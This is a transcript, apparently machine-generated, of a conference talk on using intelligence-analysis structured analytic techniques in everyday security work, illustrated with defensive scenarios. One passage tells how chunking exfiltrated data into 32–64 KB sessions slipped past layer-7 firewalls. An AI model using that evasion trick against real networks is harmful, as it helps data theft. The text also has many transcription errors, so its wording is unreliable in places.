 Thank you everybody for joining me for structured analytic techniques for improving information security analysis. I'm rabbit. No really I am. I'm sometimes also known as JJ professionally if I need a boring name for resumes and things. I'm currently the head of product security and security operations for a company called latch latch makes smart access devices and smart home integrations and a number of things for residential buildings that are sort of Internet of Things variety. We like to think that we make things that are a step above what you probably typically think of when you hear the term Internet of Things. In background and former biometric device. Federation tester I've done some medical security hospital engineering. I entered information security from the field of epidemiology and public health research. So my previous year and a half has been real interesting ride having some of that become national. My informal introduction information security is when I completely wrecked the PDP 1184 at my high school. You never forget the sound of the heads hitting the platters on those old drives. That's all I'm saying about that. And an interesting thing about me. I was raised around my father's very weird and large collection of robots. So I'm basically like a budget version of Shinji Akari. So what are structured analytical techniques. Structured analytical techniques are a set of tools for it's fun ways to manipulate data that can help you discover and eliminate biases. They can improve the accuracy and reliability of your solutions. They can share that all data is being equally considered and including included during analysis and they can enhance your creativity. So where did this come from. A few years back I was bruising files on the CIA.gov website, as one does, and I came across something called a trade craft primer, structured analytic techniques for improving intelligence analysis, and written by prepared by US government. So I never found out who actually wrote this thing but I assume it's one of these people. And there's no connection between me and the CIA or me and these authors. I just happened to be a guy who found this. So, you know, nothing. I do think though that maybe one of them might read it eventually so just in case. So, the good paper. And also just to point out anything that the CIA publishes with the words a trade craft primer on it, I am absolutely going to read that. So what portion of this is mine. What have I done. I initially thought about this mostly it was rattling around in my head in terms of how you might use it for open source intelligence or for threat intelligence. It's kind of a natural fit intelligence analysis. But as I like all of us I probably don't do anything that cool most of the time most of my time I'm spent, you know doing some more normal info sex stuff for my orgs. And so I started thinking about how could I apply the same techniques to stuff I do on a more day to day basis or, you know, sort of more mundane or might have a more widely applicable user base. There are three types of structured analytic techniques. The first one is diagnostic techniques, those are used to improve quality and make sure that your analyses are based on quality information. The second type are contrary in techniques. These are for making sure analyses are not biased or based on limited thinking. And the last type is imaginative thinking techniques. These are for developing new insights, breaking out of the box or seeing things from potentially new views. So the first structured analytical technique we'll take a look at it's called just a key assumptions check. It's kind of an easy one to start with. It's very easy to describe. It's literally taking thinking about all the assumptions you made when coming to a conclusion or performing an analysis, and writing them down, creating a list of things you've just assumed. You may review the assumptions periodically as you do the analysis just to see if your opinion of them has changed. Maybe you discovered you made an assumption you don't remember making or didn't think as an assumption at the time, or maybe you need to do some rethinking about some of the stuff you had assumed in the first place. An example of how this might help you in information security is, let's say you're replacing an old layer three firewall with a new next gen, you know, blinky light layer seven firewall. It's got deep packet inspection and it does protocol identification and all kinds of cool things that your layer three didn't. What are some assumptions you may have made that may come back to bite you in having made that decision. Well you may have assumed that newer is better often is not isn't always. You may have assumed that the default settings on the new firewall would block malicious traffic, maybe, you know, you brought out of the box and put it in a place, and it's expecting you to do a lot more tuning than you realize. You may have assumed you really only need to worry about incoming packets versus exfiltration or outgoing traffic. So you may not, you may assume that it doesn't pass traffic until it knows that traffic is good or bad. That's the one that, particularly why I chose this example is because I've encountered layer seven firewalls that allow 32 K or 64 K of data to move before they decide if the firewall is bad or not. And at the time as someone who was trying to exfiltrate. All that really meant to me was if I cut my data and the 32 or 64 K chunks I could pass right through the firewall by just restarting the session every 32 or 64 K, and it would never clamp off on that protocol as being malicious because it didn't have time. So another technique is quality of information check. That is basically where you go through all of your information and judge, judge it for its strength, its weaknesses, its importance, and its confidence. It's something you can use throughout the analytical process and you should be performing it probably periodically. It helps you detect errors in processing or collection of information. Errors in translation or errors in interpretation. It can identify attempts to deception or denial strategies if you happen to discover that maybe there's some specific problem with your data. And it can assist in communicating the amount of confidence you have in your assumptions and key information. So it's pretty easy to do all you do is take each information you're basing your assumption or conclusion on identify which of them are critical to that result, and then consider if it involves interpreted information has that been interpreted in the right context or with, you know, a complete understanding of how that should probably be interpreted. So you're working in certain response and analyzing log file sent to you by an ops team. What are some quality of information checks you could do to make sure you're working with quality source material. Well, you might check that the timestamps are accurate. They probably aren't. Are you confident that the log hasn't been tampered with is there some mechanism you can use to prove that it has some, you know, veracity to it. The log is real in the first place, you know, maybe there's someone left one for you to find. And lastly, does the log even capture the type of information you're looking and maybe you have your device configured such that the event you're looking to correlate isn't even captured in that log. Those are all things you could check to improve the quality. Another technique indicators or signposts of change. This is where you create a list of events or monitoring targets that will tell you if your situation has changed. Essentially, you identify a bunch of competing hypotheses, you know, ways that the situation may go. And then you create list of potentials at potential activities or statements or events for each scenario right if you start going down one of these paths, you may list out what would you expect to start seeing happen. And then you regularly review and update your indicators to make sure you're watching for these things. And so if you start seeing these indicators in your environment, you've got some idea of what a event might be taking. And that information security example, you may want to protect your organization from a system wide ransomware attack, you think you're in good shape because your org uses cloud storage and your domain controllers are regularly patched. You might. What might be some signposts that the assessment you've made that you don't really need to worry about it too much might be changing and you might need to rethink that scenario rethink that risk or conclusion. And then if ransomware attackers start leveraging or attacking specifically cloud storage providers a lot more. That's a fundamental change to their tactics and their, you know, TTPs by your estimation. So that should cause you to rethink your your conclusion, or what if there's a vulnerability in a domain controller, say in a principle or where Microsoft releases releases a patch that doesn't fully fix the issue that would never happen but knowing that exists, you would have to consider and consider will your conclusion or scenario of decision that you are protected, hold up over the next one, six, 2448 hours. Another diagnostic technique analysis of competing hypotheses. This is basically identifying all of the reasonable alternative explanations, and then just weighing the evidence against them to determine whether your evidence supports or refutes these potential hypotheses. And this, this is specifically done without conjecturing about the probability of the hypothesis being true hypothesis dangerous. The goal is to take your data, your your bits of evidence weigh it against each of the hypothesis and decide if each piece of evidence you have either supports it supports that particular hypothesis refuse that particular hypothesis or maybe doesn't contribute to it in any meaningful way. So you go through one at a time and you create a matrix of which bits of evidence support or if you, which hypotheses you have with the goal of refuting or disproving hypotheses, not with the goal of proving hypotheses, and that's to prevent you from going on to one particular result you might favor for one particular reason or deal is the most likely, you're not trying to do that you're trying to make sure that you've identified all of the possible potential hypotheses. It reminds me of a quote, sort of famous one when you have eliminated the impossible whatever remains however improbable improbable must be the truth, which is of course from house empty. For example, you're asked to investigate the defacement of an internal wiki page, someone has replaced all the tutorial videos with links to hardcore form. The logs don't show any edits. In fact, you don't see any activity on those pages for several years. How might you go about using a CH to figure out, help you come up with a conclusion as to what might have happened. Well you might conjecture that couldn't admin have made the changes and scrub the logs and that might be possible couldn't engineer have made the changes in the back end and that's why your logs don't match up. Could an external attacker have compromised the wiki system in some way that you don't know about yet, or could the videos themselves have changed somehow. And hopefully it's clear to a lot of you that I'm alluding to a recent event where a company purchased a domain that used to host fairly innocuous videos. And then that domain now hosts hardcore form and as a result it's showing up in a lot of old pages that haven't been touched in a while because it's true the actual videos themselves are what have changed. So let me get to contrarian techniques. Probably the one that people are most familiar with is devil's advocacy. However, I've noticed that some people will understand the term devil's advocacy to mean, arguing the opposite viewpoint. Or taking a intentionally contrary viewpoint to argue with in the context of the original government US government document. They actually use this as saying, it's more like red teaming your analysis. It's taking your own analysis and then having another faction or you playing you know another role in this analysis process. Attacking your own analysis to find weaknesses, things that might not be supported, things that might be not quite as reliable as you are using them in the final analysis. It's intended to allow you to test whether your key assumptions will hold up under different circumstances and it helps you identify faulty logic. So an information security example of devil's advocacy is a bit of a scenario for this one you're wrapping up a report on what has happened during an event. You're mostly confident you've arrived at the right conclusion as to how an attacker was able to gain access to a database and expulsion data, but the stakes are high. Let's just say, if this happened again your company is going under it's really important you have to be 100% certain about this, even that it's so important. How what can you do to ensure that the result that you've came up with or your your hypothetical scenario is as accurate as it possibly can be. Well, that's where you bust out devil's advocacy. So maybe you would take one of your really good analysts or maybe it's you sort of functioning in this this particular role but for this purposes of this with it. But you have one of your other analysts look at your report. They specifically start going through your report looking for weaknesses in the things that you've assumed weaknesses in the evidence potential faults that might disqualify some infinite evidence that you're using. They just basically tear it apart. And while they're doing that to create a report of these are all the things that are a problem with this analysis, and then they present that to the group. Now, the group can take a look at that and go, now, you know, they can, they can argue with me say well you know this really is founded because of whatever reason, or they might say, All right, you're right we need to go find some additional corroborating evidence to support this one particular piece because it's sort of a weak pillar of the final result. And that helps you make sure that your final product is based on the strongest possible determinations from the process. So very similar to devil's advocacy is team a team be analysis. A lot of people get these mixed up and in fact if you do a team a team be analysis wrong you can end up turning it into devil's advocacy, but there's a slight difference in that team a team is used when you have two potential results or final conclusions that are sort of equally probable or at least equally of equal confidence and you're not quite sure which one is the stronger one. What you might do in that situation is to take each of those hypotheses and give them to two different teams and allow each team to pursue them as their own analysis. And they often used additional sort of tricks for a team a team be analysis is to take somebody who is in favor of one particular outcome and put them on the team of the opposite outcome. And it isn't just to sort of make them angry, it's because they may have insights or understand connections between the data they're working with that the other team hasn't realized and allows you to sort do some cross pollination of that understanding of the issue. And that is that in information security, but you and your team are trying to decide how best to reduce the number of malware incidents you're experiencing within your organization. Let's say you have limited budget and time and engineering resources, and you can only really go with one thing. One group of your analysts wants a strategy involving endpoint policies updates changes to something on the endpoint. One group of analysts is really thinks that the right way to go is to put money into some network wiki box anti malware boxes that can stop stuff before it even gets to the endpoint. So one thing you might do in that situation is you might decide to give each of those two groups or tell each of those two groups to run with that idea and produce an analysis of why their solution is the best option why they we shouldn't have another option. And you might use the trick of sort of cross pollinating by taking people that are an advocate of endpoint restrictions and put them on the network restrictions game and vice versa and sort of get that But the final bit is you have sort of an agreed upon sort of formal judgment method. Maybe it's just, you know, the relevant manager decides which one was most compelling or maybe you have a team of experts who listens to the arguments and they decide which one was the most compelling who had the best argument for that particular way forward it's a bit of a debate tactic, but it can allow you to pull the best out of two potential in very close situations. So, I impact a low probability analysis. This is for when you have an event that would have dire consequences if it happened, but no one thinks it will happen. It's very useful when decision makers are convinced an event is unlikely, but maybe haven't given sufficient thought to the consequences of its occurrence with kind of dismissed it because it's very unlikely. It can be used to uncover hidden relationships and it can help analysts develop signposts from kind of like we were talking earlier, which can provide early warnings of a shift in the situation. So when you do it, you define the high impact outcome clearly, like what is actually going to happen if this occurs. And then you devise one or more pathways of series of events that could potentially get you there. You start from known good and work your way towards the high impact event that's important when comparing this with a future technique. There are possible triggers or changes that could affect the outcome right maybe it seems very unlikely because no one has the proper keys or access to the proper keys so maybe a triggering event might be he's getting released or you know keys are exposed somehow that might change this whole scenario and now you need to rethink how actual low probability it is. Anyway, you identify a set of indicators for each pathway that can be monitored. And then you set about monitoring those things so that, you know, assuming you can't do anything to fundamentally reduce this risk or remove this risk. At least now you have a set of indicators so you may get some advanced warning coming and be able to take corrective actions. To say you're concerned that your organization is not taking the risk of having too many unnecessary domain admins seriously. Most of the domain admins don't need that level of permission, but the stakeholders believe it hasn't been a problem. And it makes changes quicker in an emergency. It also makes keep security from being a bottleneck because they don't have to ask permission if they've got full and standard then you're concerned because they're the risk of a compromised admin credential or what kind of damage an internal attacker might be able to do. So maybe you conduct a high impact low probability analysis, you highlight the huge impact that happens if this very low probability event occurs. There are several pathways that could occur right credentials get leaked. There's weak passwords chosen by the people who have these, maybe an internal attacker it's having a really bad day or get some news they don't like. In fact, impact. You identify potential indicators that these events are occurring right at least now you've got some idea of what to look for you may not be able to fix the situation. Hopefully you're working on the organization to reduce the number of admins there are. But you've got some things you can watch for you can look for indications that week credentials and credentials and you can test for very weak passwords in some ways, there might be some stuff you can do. So what if analysis, a what if analysis is often confused with a high impact low likelihood analysis. But it really is almost a high impact low likelihood analysis done backwards with high impact low likelihood analysis, you started a base state and constru a path where you may arrive at the high impact event. But what if analysis you start with the high impact event, and then work your way back to identify the things that would have had to have happened for that scenario to occur. It's basically just coming from the other direction. So you start by assuming the event is happening you select some triggering events that may have permitted the scenario to. You develop a chain of argument as to how the output output outcome could have come about, and you work backwards as I mentioned, and you generate a list of indicators for each of those stages. So now you've with your high impact low likelihood analysis identified things you might monitor or consider important for detecting if it's starting or in progress. And then additional indicators for if activity is happening in each stage. And so maybe the event has occurred and now you're finding it before it works its way back on the chain. An information security example, consider again that same scenario where you're concerned about potential for domain admin credentials to become compromised. Instead, this time assume they're already compromised. So how did that happen right. And so maybe as a result of that you might identify the same vectors as before like we packed week passwords, or inside attackers. However, maybe because you're thinking the other direction this time it might occur to you that maybe the help desk, don't some caches off of something because someone logged in with admin creds and whatever it was was set up to cash that. So you might, as a result of that decide well, I'm going to add to the list of things I can wash watch for or do check for excessive ash caching of especially domain admin creds. And, you know, maybe there's something you can do to make sure you're catching and people are using domain admin creds for like needless local logins. Now get a little more information of things you might work for your environment to detect these specific types of problems. Moving on to the, the imaginative thinking techniques, I think these are probably the most obvious to people are the easiest to for people to wrap their head around. People are used to the idea of brainstorming they've heard that term a lot. The other thing is again, the source material talks about brainstorming as a group activity. And obviously because they're doing sort of structured beans and things to bring about brainstorming I think when we just say brainstorming we think of it, often as just coming up with things off the top of your head, you know that might be off the wall. And that's true and you can do that by yourself but in this context they're talking about it as a group activity. And it's, it's, it's quickly generating a range of high policies that can then be refined tested further developed or discarded it just creates raw material you can work from some ideas, things that you can then later go and do, you know, test your evidence against and think which of those you can discard is right off the bat as well that's not going to happen I have a second be the results, but it just generates you things to work with gives you more creative points to start your analysis with. Typically, in terms of structured analytical technique. This is done by assembling a group of analysts with others relevant, or others with relevant knowledge. You can generate ideas, which can plausibly fit the supplied evidence, and you never censor an idea, you take whatever people throw at you, and no matter how at Landish, and you throw it up in the board but if it's real outlandish. You kind of use that as an opportunity to find out what where did that occur to you what are you thinking maybe there's some information in that connection right, it didn't occur to you to think that but they might have some understanding that caused them to, you know, to reach that connection or maybe they're thinking about the problem space in a completely different way and that's why it seems oddballed to you but when you talk to them about it, it'll seem less oddball. How might you use that in intersect so your new Internet of Things product must store credentials and tokens so that can communicate with your service. However, the selected hardware doesn't contain a secure on a secure element. You don't have any way to securely store the material or resist recovery. We'll just assume in this, this fictional device, you can always get these crimes off of it. How might you address the risks of credential theft or cloning. I don't know, but maybe we would use brainstorming might come up with some ideas. Maybe there's some other immutable characteristic of the device we can use to identify it. We don't need to store a specific token. Maybe we just don't have credentials and tokens in the first place what if we read thought how the product works, and she got rid of them somehow. Or maybe it's a feature, maybe we want people to clone them maybe that's a great idea, and it enables you know some sort of other business model force with the same legit. So red team analysis, I think it's another technique but I think it's specifically in this context we have to be careful to understand what red team analysis is actually means. I think more in the context used in the structure analytical techniques of what I would consider a threat simulation, or an adversary simulation, meaning you are determining, you're analyzing what the red team might be able to do instead of red team in your analysis. If you do it. Analyst takes on the position of a potential adversary, just, you know, tries it on in a thought space and and tries to keep in mind the motivations and the constraints, the adversary is driven by or restricted by. And then they develop a list of first person questions the adversary may be trying to answer for themselves. What would you do with this particular result or what would my next prior if I reach a certain point of exploitation what would my next priority be because what is my ultimate goal it might be specific to these threat actors. You then lay out and prioritize all the possible next steps and adversary and adversary may take based on the answers you came up with those questions when you sort of play acting that role. So if you do that and lay out and prioritize all those possible next steps is now you've got another set of great things you can look for and monitor that will help you figure out if these these sort of activities are occurring in your environment. Information security example. So you've set up several high interaction honeypots, honeypots in various places on your networks periphery, you notice a potential attacker. They always connect sort of at the same time they connect real quick they get in. They run a few meaningless seeming commands where they just check the user ID to make sure they're rude. And you know, maybe they enumerate some processes and dump some information about you know what kernel is running, and then they leave. And you do that over and over and over and never do anything more with it. So, you might find yourself. Well, what's wrong. What's wrong with my honeypots right. Well, you might conjecture well, maybe the attackers detecting it's a honeypot and just dropping off. So maybe I need to change something up or you might decide that the attacker is really looking for a specific type of host maybe they're like a processor, certain, you know, code revision to pull off whatever it is they're looking to exploit this host for. And that's why they're not interested in it. Or does the attacker have a lot of compromised systems already, and they're just doing this because they want to know if it's still active, they're just keeping it in the loop in case they ever need it someday. Maybe it's all automated maybe no human has ever done this some bot just pop your honeypot and report it home yeah I got something great, and it goes into some list and see to and they'll use it someday maybe knowing the viewpoint of your attacker like why they may be doing that. In this scenario I threw in the IPs tips you off that it's some specific actor. I don't think that normally happens but let's assume, you know, you could say, Oh, well I understand from this attacker's point of view, you know, they've got a tongue these things so likely if we keep watching it eventually they'll come back and we'll actually use this for something useful to them. What have we learned, we learned if you're concerned about information quality, then use diagnostic techniques. If you're concerned about information biases, use conferring techniques, you're concerned about information completeness, use imaginative thinking techniques. And where can you learn more the document that I started with is fantastic. It goes way in more depth, you should really read it if you found any of this interesting. It's a great document from the Rand Corporation where they analyze the first document and then decide whether they think it's good or not. That's fantastic. And then there is a book structured analytic techniques for intelligence analysis by Richard Heuer and Randolph Pearson. It's $900 on Amazon so I didn't read that at all. I hear it's really good. If someone can get me a copy of that book I would love to read it but I'm definitely not paying. So if you have any questions, I'm rabbit. I'm pretty easy to find on Twitter. You can email rabbit rabbit comms right sixes. I will respond to these around. And thank you for listening me blabber for half hour about structure.